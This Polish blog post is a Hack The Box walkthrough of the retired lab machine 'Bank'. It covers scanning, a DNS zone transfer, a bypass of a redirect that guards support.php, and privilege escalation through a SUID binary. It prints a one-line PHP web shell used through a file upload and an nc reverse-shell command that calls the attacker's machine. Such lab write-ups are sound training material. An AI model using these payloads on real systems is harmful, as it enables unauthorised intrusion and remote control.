Zobacz, jak włamałem się do Banku! (od HTB)

Testy penetracyjne pozwalają wcielić się w rolę hakera, aby sprawdzić zabezpieczenia systemów. Dziś pokażę, jak włamałem się do maszyny „Bank” na platformie Hack The Box (HTB).

Czym jest Hack The Box?

Hack The Box to platforma umożliwiająca naukę cyberbezpieczeństwa. Udostępnia maszyny symulujące rzeczywiste systemy, na których można testować swoje umiejętności. Maszyny podzielone są na dwie kategorie:

  1. Aktywne, których rozwiązania muszą pozostać tajemnicą.
  2. Retired, czyli te, które można publicznie analizować i publikować walkthrough.

Dziś skupimy się na maszynie „Bank” z kategorii retired. To idealny przykład dla początkujących, aby nauczyć się testów penetracyjnych.

CYBERGURU NA ŻYWO

Kalendarz darmowych szkoleń

Zapomnij o domysłach z forów internetowych czy niesprawdzonych tutorialach.

Wejdź do świata OSINT-u, poznaj mechanizmy Darknetu i zobacz, jak zniknąć z radarów i chronić swoją tożsamość. Spotykamy się na żywo, rozwiązujemy realne case’y i rozkładamy zagrożenia na czynniki pierwsze.

Sprawdź nasz harmonogram i dołącz do sesji, która Cię interesuje – czas na Twój ruch w cieniu.

Przygotowanie narzędzi

Do pracy potrzebujesz systemu operacyjnego dedykowanego testom penetracyjnym, np. Kali Linux

Rekomendowane narzędzia:

  • Nmap do skanowania portów,
  • Burp Suite do analizy żądań HTTP,
  • Feroxbuster do enumeracji zasobów.

Pierwszy krok to połączenie się z siecią VPN HTB. Pobieramy plik konfiguracji OpenVPN i uruchamiamy połączenie. Następnie upewniamy się, że maszyna „Bank” odpowiada, pingując jej adres IP.

Rozpoznanie maszyny

Przeprowadzamy rekonesans, zaczynając od skanowania portów za pomocą Nmap:

nmap -p- -v 10.129.29.200

Znalezione porty to:

  • 22 – SSH,
  • 53 – serwer DNS (Bind),
  • 80 – HTTP.

Dodatkowe skanowanie (-sC -sV) ujawnia, że maszyna działa na systemie Ubuntu Linux. Port 53 wskazuje na potencjalną podatność związaną z Zone Transfer.

Zone Transfer i konfiguracja domen

Zone Transfer pozwala podejrzeć konfigurację DNS. Używamy:

dig axfr @10.129.29.200 bank.htb

Efekt? Otrzymujemy listę domen powiązanych z maszyną:

  • bank.htb
  • ns.bank.htb
  • www.bank.htb.

Dodajemy te wpisy do pliku /etc/hosts, aby móc je przeglądać:

10.129.29.200 bank.htb ns.bank.htb www.bank.htb

Odkrywanie zasobów HTTP

Korzystamy z Feroxbuster w celu zidentyfikowania ukrytych ścieżek:

feroxbuster -u http://bank.htb -x php

Znajdujemy interesujące zasoby, m.in. support.php. Problem? Jest chroniony i wymaga autoryzacji.

Eksploatacja poprzez Burp Suite

Burp Suite pozwala analizować i modyfikować żądania HTTP. Zmieniamy odpowiedź serwera z przekierowania (302) na status „200 OK”. Dzięki temu możemy uzyskać dostęp do ukrytej zawartości serwisu.

Wgrywanie plików i wykonanie kodu

Na stronie support.php mamy możliwość wgrywania plików. Wykorzystujemy to, aby załadować plik PHP z opcją wykonania komend:

<?php echo system($_REQUEST[’cmd’]); ?>

Po wgraniu pliku wywołamy komendy, dodając parametry w adresie URL:

http://bank.htb/uploads/cmd.php?cmd=ls

POZNAJ CYBERAKADEMIĘ

Skoro już tu jesteś - rozwiń swoje cyberumiejętności!

Dołącz do ponad 5000 kursantów, którzy zaczynali dokładnie tak jak Ty – od artykułu na blogu.
Wybierz kurs dopasowany do Twojego poziomu i zacznij ćwiczyć pod okiem praktyka.
Linux Streamline Icon: https://streamlinehq.com

Kali Linux od Podstaw

Poznaj system operacyjny używany przez pentesterów na całym świecie. Kurs prowadzi Cię krok po kroku – od instalacji, przez podstawowe komendy, po pierwsze testy bezpieczeństwa. Praktyczna wiedza, która otwiera drzwi do kariery w cybersec.

Ten kurs to praktyka pracy z terminalem: od pierwszych kroków po analizę bezpieczeństwa i automatyzację. Poznasz logikę działania Linuxa i dowiesz się, jak budować własne polecenia. Koniec z bezmyślnym kopiowaniem komend – tu zaczyna się Twoja niezależność.

Reverse Shell

Aby uzyskać interaktywny dostęp do maszyny, konfigurujemy Reverse Shell:

  1. Na swojej maszynie uruchamiamy nasłuch:
    nc -lvnp 4444
  2. W przeglądarce wykonujemy komendę, aby połączyć się z naszym serwerem:
    http://bank.htb/uploads/cmd.php?cmd=nc 10.10.14.153 4444 -e /bin/bash

Po nawiązaniu połączenia jesteśmy użytkownikiem systemu.

Podniesienie uprawnień (Privilege Escalation)

Na maszynie wyszukujemy pliki z nietypowymi uprawnieniami:

find / -perm -4000 2>/dev/null

Znaleziony plik /htb/bin/emergency umożliwia eskalację uprawnień. Po jego uruchomieniu stajemy się użytkownikiem root:

/htb/bin/emergency

Zdobycie flag

Każda maszyna HTB zawiera dwie flagi:

  1. User Flag – w katalogu użytkownika:
    bash
    cat /home/user/user.txt
  2. Root Flag – w katalogu root:
    cat /root/root.txt

Wklejamy je na stronie HTB, aby potwierdzić ukończenie zadania.

Wnioski

Testy penetracyjne są niezwykle cenne pod kątem nauki cyberbezpieczeństwa. To proces wymagający cierpliwości, precyzji i ciągłego uczenia się. Pamiętaj jednak, że hakowanie jest legalne tylko w odpowiednich środowiskach testowych lub za zgodą właściciela systemu.

O autorze

Od ponad 15 lat pracuję w branży IT, a od 2018 roku zawodowo zajmuję się cyberbezpieczeństwem, analizą incydentów i testami penetracyjnymi.

Na co dzień mam do czynienia z prawdziwymi danymi, realnymi zagrożeniami i sytuacjami, w których błędne założenie kosztuje czas, pieniądze albo bezpieczeństwo. To doświadczenie bardzo mocno ukształtowało mój sposób myślenia – i dokładnie ten sposób myślenia chcę Ci przekazać w Cyberdetektywie.

Ten kurs powstał dlatego, że przez lata widziałem, jak wiele problemów bierze się z braku umiejętności weryfikowania informacji, łączenia faktów i odróżniania danych od domysłów. W pracy z incydentami i bezpieczeństwem bardzo szybko wychodzi na jaw, kto potrafi analizować sytuację, a kto tylko zgaduje – i ta różnica jest kluczowa również poza światem IT w zupełnie prywatnych warunkach.

Cyberdetektyw nie jest kursem teoretycznym ani zbiorem efektownych trików. To próba przeniesienia podejścia znanego z cyberbezpieczeństwa i pentestów do świata OSINT-u. Pokażę Ci nie tylko narzędzia i techniki, ale przede wszystkim tok myślenia, który wykorzystuję w swojej pracy.